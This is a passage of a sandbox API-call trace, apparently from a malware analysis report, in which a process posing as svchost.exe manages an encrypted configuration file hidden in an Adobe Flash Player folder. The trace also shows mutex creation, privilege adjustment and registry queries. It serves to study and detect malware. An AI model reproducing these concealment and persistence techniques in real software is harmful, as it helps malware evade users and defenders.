15:43:24] ver=2.2.5, log=0x0014, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (16) = ", cchWideChar=131, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 131 [0121.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0014, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (16) = ", cchWideChar=131, lpMultiByteStr=0x5401618, cbMultiByte=132, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0014, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (16) = ", lpUsedDefaultChar=0x0) returned 131 [0121.838] GetSystemTime (in: lpSystemTime=0x735f218 | out: lpSystemTime=0x735f218*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x104)) [0121.838] SystemTimeToFileTime (in: lpSystemTime=0x735f218, lpFileTime=0x735f208 | out: lpFileTime=0x735f208) returned 1 [0121.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412108, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0121.838] GetUserNameExW () returned 0x1 [0121.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0121.839] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413088, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="8A") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="B7") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="49") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="67") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="98") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="F6") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="14") returned 2 [0121.840] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="59") returned 2 [0121.841] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="35") returned 2 [0121.841] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="AA") returned 2 [0121.841] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="3E") returned 2 [0121.841] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="27") returned 2 [0121.841] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="60") returned 2 [0121.841] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0121.841] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0121.841] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0121.841] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0121.842] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0121.842] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0121.842] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0121.842] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0121.842] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0121.843] GetCurrentThread () returned 0xfffffffe [0121.843] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x0) returned 0 [0121.843] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x208) returned 1 [0121.843] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f26c | out: lpLuid=0x735f26c*(LowPart=0x8, HighPart=0)) returned 1 [0121.844] AdjustTokenPrivileges (in: TokenHandle=0x208, DisableAllPrivileges=0, NewState=0x735f268*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.844] GetLastError () returned 0x0 [0121.844] CloseHandle (hObject=0x208) returned 1 [0121.844] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.844] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214550, lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298 | out: lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298) returned 1 [0121.844] SetNamedSecurityInfoW () returned 0x0 [0121.958] LocalFree (hMem=0x5214550) returned 0x0 [0121.959] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0121.960] GetCurrentThread () returned 0xfffffffe [0121.960] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x0) returned 0 [0121.966] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x208) returned 1 [0121.966] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f26c | out: lpLuid=0x735f26c*(LowPart=0x8, HighPart=0)) returned 1 [0121.968] AdjustTokenPrivileges (in: TokenHandle=0x208, DisableAllPrivileges=0, NewState=0x735f268*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.968] GetLastError () returned 0x0 [0121.968] CloseHandle (hObject=0x208) returned 1 [0121.968] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.968] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214430, lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298 | out: lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298) returned 1 [0121.968] SetNamedSecurityInfoW () returned 0x0 [0121.970] LocalFree (hMem=0x5214430) returned 0x0 [0121.971] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0121.971] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x735f2b0 | out: lpFileSize=0x735f2b0*=2338) returned 1 [0121.971] VirtualAlloc (lpAddress=0x0, dwSize=0x922, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0121.971] ReadFile (in: hFile=0x208, lpBuffer=0x50d0000, nNumberOfBytesToRead=0x922, lpNumberOfBytesRead=0x735f2bc, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x735f2bc*=0x922, lpOverlapped=0x0) returned 1 [0121.977] CloseHandle (hObject=0x208) returned 1 [0121.978] wvnsprintfA (in: pszDest=0x5413a88, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366202") returned 10 [0121.979] wvnsprintfA (in: pszDest=0x5413ae8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.980] wvnsprintfA (in: pszDest=0x5413a88, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.981] wvnsprintfA (in: pszDest=0x5413a88, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.982] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.983] wvnsprintfA (in: pszDest=0x5413bc8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.984] wvnsprintfA (in: pszDest=0x5413b08, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.985] wvnsprintfA (in: pszDest=0x5413ac8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.986] wvnsprintfA (in: pszDest=0x5413a48, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0121.988] wvnsprintfA (in: pszDest=0x5413bc8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0121.989] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0121.990] WriteFile (in: hFile=0x208, lpBuffer=0x5403670*, nNumberOfBytesToWrite=0xa21, lpNumberOfBytesWritten=0x735f2b4, lpOverlapped=0x0 | out: lpBuffer=0x5403670*, lpNumberOfBytesWritten=0x735f2b4, lpOverlapped=0x0) returned 1 [0121.992] CloseHandle (hObject=0x208) returned 1 [0122.001] ReleaseMutex (hMutex=0x1cc) returned 1 [0122.001] CloseHandle (hObject=0x1cc) returned 1 [0122.001] SetLastError (dwErrCode=0x0) [0122.001] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f5ac | out: phkResult=0x735f5ac*=0x1cc) returned 0x0 [0122.002] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x735f5d8, lpData=0x0, lpcbData=0x735f5bc*=0x0 | out: lpType=0x735f5d8*=0x0, lpData=0x0, lpcbData=0x735f5bc*=0x0) returned 0x2 [0122.002] RegCloseKey (hKey=0x1cc) returned 0x0 [0122.002] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0122.002] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x735f5b0 | out: lpFileSize=0x735f5b0*=0) returned 1 [0122.002] CloseHandle (hObject=0x1cc) returned 1 [0122.003] GetLastError () returned 0x0 [0122.003] GetLastError () returned 0x0 [0122.003] GetLocalTime (in: lpSystemTime=0x735f5c0 | out: lpSystemTime=0x735f5c0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x19f)) [0122.003] GetCurrentThreadId () returned 0xd70 [0122.003] GetCurrentProcessId () returned 0x2ec [0122.003] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f564 | out: pszDest="[13.10.2016 15:43:24] ver=2.2.5, log=0x0015, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0122.003] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x735f5e0 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0122.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0015, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0122.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0015, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5416780, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0015, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0122.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0015, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0122.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0015, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5416660, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0015, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0122.004] GetSystemTime (in: lpSystemTime=0x735f1b0 | out: lpSystemTime=0x735f1b0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x19f)) [0122.004] SystemTimeToFileTime (in: lpSystemTime=0x735f1b0, lpFileTime=0x735f1a0 | out: lpFileTime=0x735f1a0) returned 1 [0122.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x54120a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0122.005] GetUserNameExW () returned 0x1 [0122.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0122.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x54130c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="8A") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="B7") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="49") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="67") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="98") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="F6") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="14") returned 2 [0122.009] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="59") returned 2 [0122.010] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="35") returned 2 [0122.010] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="AA") returned 2 [0122.010] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="3E") returned 2 [0122.010] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="27") returned 2 [0122.010] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="60") returned 2 [0122.010] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0122.010] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0122.010] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0122.010] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0122.011] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0122.011] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0122.011] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0122.011] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0122.011] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0122.012] GetCurrentThread () returned 0xfffffffe [0122.012] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x0) returned 0 [0122.012] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x208) returned 1 [0122.012] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f204 | out: lpLuid=0x735f204*(LowPart=0x8, HighPart=0)) returned 1 [0122.013] AdjustTokenPrivileges (in: TokenHandle=0x208, DisableAllPrivileges=0, NewState=0x735f200*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.013] GetLastError () returned 0x0 [0122.013] CloseHandle (hObject=0x208) returned 1 [0122.013] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.013] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214550, lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230 | out: lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230) returned 1 [0122.014] SetNamedSecurityInfoW () returned 0x0 [0122.022] LocalFree (hMem=0x5214550) returned 0x0 [0122.022] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0122.023] GetCurrentThread () returned 0xfffffffe [0122.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x0) returned 0 [0122.023] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x208) returned 1 [0122.023] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f204 | out: lpLuid=0x735f204*(LowPart=0x8, HighPart=0)) returned 1 [0122.024] AdjustTokenPrivileges (in: TokenHandle=0x208, DisableAllPrivileges=0, NewState=0x735f200*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.024] GetLastError () returned 0x0 [0122.024] CloseHandle (hObject=0x208) returned 1 [0122.025] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.025] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214550, lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230 | out: lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230) returned 1 [0122.025] SetNamedSecurityInfoW () returned 0x0 [0122.026] LocalFree (hMem=0x5214550) returned 0x0 [0122.026] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0122.027] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x735f248 | out: lpFileSize=0x735f248*=2593) returned 1 [0122.027] VirtualAlloc (lpAddress=0x0, dwSize=0xa21, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0122.027] ReadFile (in: hFile=0x208, lpBuffer=0x50d0000, nNumberOfBytesToRead=0xa21, lpNumberOfBytesRead=0x735f254, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x735f254*=0xa21, lpOverlapped=0x0) returned 1 [0122.034] CloseHandle (hObject=0x208) returned 1 [0122.035] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366202") returned 10 [0122.036] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.037] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.078] wvnsprintfA (in: pszDest=0x5413b48, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.078] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.079] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.080] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.081] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.082] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.083] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.084] wvnsprintfA (in: pszDest=0x5413b28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.085] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 